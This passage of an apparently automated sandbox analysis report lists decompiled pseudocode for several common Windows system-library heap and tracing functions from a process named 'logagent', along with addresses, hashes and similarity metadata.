				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E051EA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                              0x051f90af
                                              0x051f90b8
                                              0x051f90bb
                                              0x051f90bf
                                              0x051f90c2
                                              0x051f90c2
                                              0x051f90c8
                                              0x051f90cb
                                              0x051f90cd
                                              0x052314d7
                                              0x052314eb
                                              0x052314eb
                                              0x00000000
                                              0x052314eb
                                              0x052314db
                                              0x052314e6
                                              0x00000000
                                              0x052314f2
                                              0x052314e8
                                              0x00000000
                                              0x052314e8
                                              0x051f90d8
                                              0x051f90da
                                              0x051f90dd
                                              0x051f90e5
                                              0x00000000
                                              0x051f9139
                                              0x051f90fa
                                              0x051f90fe
                                              0x051f9142
                                              0x00000000
                                              0x051f9142
                                              0x051f9104
                                              0x051f9107
                                              0x051f910b
                                              0x051f9110
                                              0x051f9118
                                              0x051f9147
                                              0x051f9148
                                              0x051f914f
                                              0x051f9150
                                              0x051f9151
                                              0x051f9152
                                              0x051f9156
                                              0x051f915d
                                              0x051f9160
                                              0x051f9168
                                              0x051f916c
                                              0x051f91bc
                                              0x051f91be
                                              0x00000000
                                              0x051f91be
                                              0x051f916e
                                              0x051f9173
                                              0x051f9176
                                              0x00000000
                                              0x00000000
                                              0x051f917c
                                              0x051f9180
                                              0x051f91b5
                                              0x00000000
                                              0x051f91b5
                                              0x051f9182
                                              0x051f9185
                                              0x051f9189
                                              0x00000000
                                              0x00000000
                                              0x051f918e
                                              0x051f9190
                                              0x051f9198
                                              0x00000000
                                              0x00000000
                                              0x051f91a0
                                              0x00000000
                                              0x051f91ad
                                              0x051f91ad
                                              0x051f91b0
                                              0x051f91b1
                                              0x00000000
                                              0x051f9185
                                              0x051f911a
                                              0x051f911c
                                              0x051f911f
                                              0x051f9125
                                              0x051f9127
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                              • Instruction ID: 93dd8be1abab96ee8647eee86b96f53d75da3eb1b87527ffcdcb2c40be69e9b6
                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                              • Instruction Fuzzy Hash: 21217F71A04305EFDB20EF59C844EAAF7F8EF44320F15887AEA49A7211D370A914CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E3B7A Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E051E3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x52a84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x52a84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x52a84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E051FAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E051FFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x52a84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x52a84c4; // 0x0
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                              0x051e3b89
                                              0x051e3b96
                                              0x051e3ba1
                                              0x051e3bab
                                              0x051e3bb5
                                              0x051e3bb9
                                              0x05226298
                                              0x051e3bbf
                                              0x051e3bc2
                                              0x051e3bc3
                                              0x051e3bc9
                                              0x051e3bca
                                              0x051e3bcc
                                              0x051e3bcd
                                              0x051e3bd4
                                              0x051e3bd6
                                              0x051e3bdb
                                              0x051e3bea
                                              0x051e3bf7
                                              0x051e3bfb
                                              0x051e3bff
                                              0x051e3c09
                                              0x051e3c0a
                                              0x051e3c0b
                                              0x051e3c0f
                                              0x051e3c14
                                              0x051e3c18
                                              0x051e3c18
                                              0x051e3bfb
                                              0x051e3c1b
                                              0x051e3c30
                                              0x051e3c30
                                              0x051e3c3d

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 446ff44c143dab2ad7ce0140539bc4d89fc23598775620eb073514e914838998
                                              • Instruction ID: 5331e362e12bb53fcde1973228bcc823f9043fe4e664f68fe924687d5ff0d223
                                              • Opcode Fuzzy Hash: 446ff44c143dab2ad7ce0140539bc4d89fc23598775620eb073514e914838998
                                              • Instruction Fuzzy Hash: 70219FB2A00508AFC704DF58DD85F6ABBBDFF44708F250469EA09AB252D771ED11CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05236CF0 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E05236CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E051D7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E051D7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5195c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E051EF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E051EF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05237016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L051D2400( &_v52);
								}
								_t21 = L051D2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                              0x05236cfb
                                              0x05236d00
                                              0x05236d02
                                              0x05236d06
                                              0x05236d0a
                                              0x05236d0e
                                              0x05236d19
                                              0x05236d2b
                                              0x05236d1b
                                              0x05236d24
                                              0x05236d24
                                              0x05236d33
                                              0x05236d39
                                              0x05236d46
                                              0x05236d4f
                                              0x05236d61
                                              0x05236d51
                                              0x05236d5a
                                              0x05236d5a
                                              0x05236d69
                                              0x05236d6b
                                              0x05236d6d
                                              0x05236d6f
                                              0x05236d6f
                                              0x05236d74
                                              0x05236d79
                                              0x05236d7a
                                              0x05236d7f
                                              0x05236d82
                                              0x05236d88
                                              0x05236d89
                                              0x05236d90
                                              0x05236d94
                                              0x05236da7
                                              0x05236db1
                                              0x05236db1
                                              0x05236dbb
                                              0x05236dbb
                                              0x05236d90
                                              0x05236d69
                                              0x05236d46
                                              0x05236dc6

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a7289501f770eb603c424c3f2dfda667f7e503e51a3dd68874551b23062c19c5
                                              • Instruction ID: b0cba5b5a2b76b632c799975efac332a1c954ba65fbdf18b60e2becdb479cf79
                                              • Opcode Fuzzy Hash: a7289501f770eb603c424c3f2dfda667f7e503e51a3dd68874551b23062c19c5
                                              • Instruction Fuzzy Hash: DD21F2B261465AABC711DF28C949B6BB7ECFF81640F080456FD84C7251E734EA09C6A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0528070D Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E0528070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E052807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0527AFDE( &_v8,  &_v12);
					E05281293(_t38, _v28, _t60);
					if(E051D7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E052714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                              0x0528071b
                                              0x05280724
                                              0x05280734
                                              0x05280738
                                              0x0528074b
                                              0x0528074b
                                              0x05280753
                                              0x05280753
                                              0x05280759
                                              0x0528075d
                                              0x05280774
                                              0x05280779
                                              0x0528077d
                                              0x05280789
                                              0x05280795
                                              0x052807a7
                                              0x05280797
                                              0x052807a0
                                              0x052807a0
                                              0x052807af
                                              0x052807c4
                                              0x052807cd
                                              0x052807cd
                                              0x052807af
                                              0x052807dc

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                              • Instruction ID: 759581ddf93e7dae63e6fab9290af5e98751b9226948bff4442e2575cda45bcc
                                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                              • Instruction Fuzzy Hash: 2E2122363186049FC705EF68C888B6ABBA5FFC0310F048529F8998B3C5C730E919CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05282EF7 Relevance: .1, Instructions: 72COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 35%
                                              			E05282EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x52ad360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E051FD0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E051FD0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E051D2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x52ab1e0();
						 *( *(_t106 + 0x30) ^  *0x52a6110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x52ab1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x52a6110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E051CFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E051FB640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x519ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x519ac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}






































                                              0x05282efc
                                              0x05282efd
                                              0x05282eff
                                              0x05282f03
                                              0x05282f0a
                                              0x05282f0c
                                              0x05282f15
                                              0x05282fba
                                              0x05282fbb
                                              0x05282fc5
                                              0x05282fcd
                                              0x05282fcf
                                              0x05282fd3
                                              0x05282fd4
                                              0x05282fd5
                                              0x05282fd7
                                              0x05282fda
                                              0x05282fdb
                                              0x05282fdd
                                              0x05282fe0
                                              0x05282fe2
                                              0x05282ffc
                                              0x05282fe4
                                              0x05282fe4
                                              0x05282fea
                                              0x05282fed
                                              0x05282fef
                                              0x05282ff6
                                              0x05282ff1
                                              0x05282ff1
                                              0x05282ff1
                                              0x05282fef
                                              0x05282fff
                                              0x05283001
                                              0x0528301b
                                              0x05283003
                                              0x05283003
                                              0x0528300e
                                              0x05283015
                                              0x05283010
                                              0x05283010
                                              0x05283010
                                              0x05283010
                                              0x0528300e
                                              0x0528302c
                                              0x05283035
                                              0x0528303c
                                              0x05283046
                                              0x0528304e
                                              0x05283056
                                              0x0528305a
                                              0x0528305e
                                              0x05283063
                                              0x05283067
                                              0x0528306b
                                              0x0528306f
                                              0x05283072
                                              0x052830af
                                              0x052830b5
                                              0x052830c1
                                              0x052830c9
                                              0x052830c9
                                              0x052830c9
                                              0x00000000
                                              0x05283074
                                              0x05283081
                                              0x05283089
                                              0x0528308b
                                              0x0528308d
                                              0x05283093
                                              0x0528309a
                                              0x052830ce
                                              0x052830d1
                                              0x052830d5
                                              0x052830d5
                                              0x052830d5
                                              0x0528308d
                                              0x052830db
                                              0x052830e6
                                              0x052830e7
                                              0x052830e8
                                              0x052830e9
                                              0x052830f3
                                              0x05282f27
                                              0x05282f29
                                              0x05282f2b
                                              0x05282f2d
                                              0x05282f36
                                              0x05282f3d
                                              0x05282f4c
                                              0x05282f58
                                              0x05282fad
                                              0x05282fb7
                                              0x05282fb7

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7caf4cbd7d64feae1d3584e6975b7ef8eaf689be2ba7dd27dd7b1867fb938f0c
                                              • Instruction ID: fe31f4e838e3948b5701eaed2b439c583dd92b41bb71956dab34120b715ff1cf
                                              • Opcode Fuzzy Hash: 7caf4cbd7d64feae1d3584e6975b7ef8eaf689be2ba7dd27dd7b1867fb938f0c
                                              • Instruction Fuzzy Hash: 5421E7712451604FDB04CB5AC8A09B6BFE1EFD712275E85F5E888CF343C524980AC7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05237794 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E05237794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x52a7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E051FF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E051D7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E051F9AE0();
					_t24 = L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                              0x05237799
                                              0x0523779a
                                              0x0523779b
                                              0x052377a3
                                              0x052377ab
                                              0x052377ae
                                              0x052377b1
                                              0x052377b1
                                              0x052377bf
                                              0x052377c4
                                              0x052377c8
                                              0x052377ce
                                              0x052377d4
                                              0x052377e0
                                              0x052377e0
                                              0x052377d6
                                              0x052377d6
                                              0x052377de
                                              0x00000000
                                              0x00000000
                                              0x052377de
                                              0x052377e5
                                              0x052377f0
                                              0x052377f3
                                              0x052377f6
                                              0x052377fd
                                              0x05237800
                                              0x0523780c
                                              0x05237818
                                              0x0523782b
                                              0x0523781a
                                              0x05237823
                                              0x05237823
                                              0x05237830
                                              0x05237831
                                              0x05237838
                                              0x0523783d
                                              0x0523783e
                                              0x0523784f
                                              0x0523784f
                                              0x0523785a

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0e5aadffc1a39e1ecd509c7a020e52eaa20ca97adfa0d9c8b846e2369177fda
                                              • Instruction ID: cf2f3e5bb6a82338864a00a756ed425ce3d181b10bb98c7908eafe1638a236da
                                              • Opcode Fuzzy Hash: c0e5aadffc1a39e1ecd509c7a020e52eaa20ca97adfa0d9c8b846e2369177fda
                                              • Instruction Fuzzy Hash: 4721A1B2610604ABCB25DF69D884E6BBBA9FF48740F14056DF50AC7750D734EA00CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05281FF1 Relevance: .1, Instructions: 70COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E05281FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x52a6110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x52a6110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x52a6110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x52a6110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}












                                              0x05281ff9
                                              0x05281ffc
                                              0x05282001
                                              0x0528200d
                                              0x0528201b
                                              0x05282028
                                              0x0528202e
                                              0x05282035
                                              0x05282038
                                              0x0528204c
                                              0x05282052
                                              0x05282053
                                              0x05282054
                                              0x05282055
                                              0x05282069
                                              0x0528206c
                                              0x0528206e
                                              0x05282079
                                              0x05282087
                                              0x0528209c
                                              0x0528209c
                                              0x0528202a
                                              0x0528202a
                                              0x0528202a
                                              0x052820a5

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a23cadafdb05aa8db841feb60ca3f2388474f28d357e76a57f5d6fe83fea6b1d
                                              • Instruction ID: 5384155e6e07a6f5db5fedac2b22df2261b54dc62b215d0409dd55cd057dbeb2
                                              • Opcode Fuzzy Hash: a23cadafdb05aa8db841feb60ca3f2388474f28d357e76a57f5d6fe83fea6b1d
                                              • Instruction Fuzzy Hash: 8B21B733A204159B9B18CF7CD805566FBE6EF9C31132A467AD826EB295DB70BD11C6C0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051DAE73 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E051DAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E051D7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E051D7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E051D7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E051D7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05237794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                              0x051dae78
                                              0x051dae7c
                                              0x051dae7e
                                              0x051dae81
                                              0x051dae86
                                              0x051dae8d
                                              0x05222691
                                              0x051dae93
                                              0x051dae93
                                              0x051dae93
                                              0x051dae98
                                              0x051dae9d
                                              0x052226a2
                                              0x052226b4
                                              0x052226a4
                                              0x052226ad
                                              0x052226ad
                                              0x052226b9
                                              0x00000000
                                              0x052226bb
                                              0x00000000
                                              0x052226bb
                                              0x051daea3
                                              0x051daea3
                                              0x051daea3
                                              0x051daeaa
                                              0x052226c0
